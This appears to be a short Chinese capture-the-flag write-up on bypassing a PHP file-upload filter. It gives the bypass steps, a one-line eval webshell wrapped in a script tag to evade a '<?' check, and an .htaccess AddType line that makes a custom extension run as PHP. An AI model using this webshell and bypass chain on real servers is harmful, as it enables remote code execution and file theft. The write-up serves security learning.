有几个上传限制,一起来看一下1、后缀名不能有ph!
对于文件后缀名的限制,无法绕过这里
2、上传类型也太露骨了吧!
对Content-Type
的限制,修改为image/jpeg
即可绕过
3、诶,别蒙我啊,这标志明显还是php啊
对上传文件的内容进行了检测,不能含有<?
,这里的PHP版本为:PHP/5.6.23
,可以使用<script language="php">eval($_POST['mochu7']);</script>
绕过
只有文件名那里无法直接绕过,本来看到这里的WEB应用服务器是openresty
没有直接想到.htaccess
,后经查阅资料发现nginx
也是可以支持.htaccess
的,所以这里就可以利用上传一个.htaccess
文件将别的后缀名文件内容解析为php程序
AddType application/x-httpd-php .mochu
然后上传shell即可
有disable_functions
,但看了一下被禁用的函数,还是可以进行目录浏览和文件读取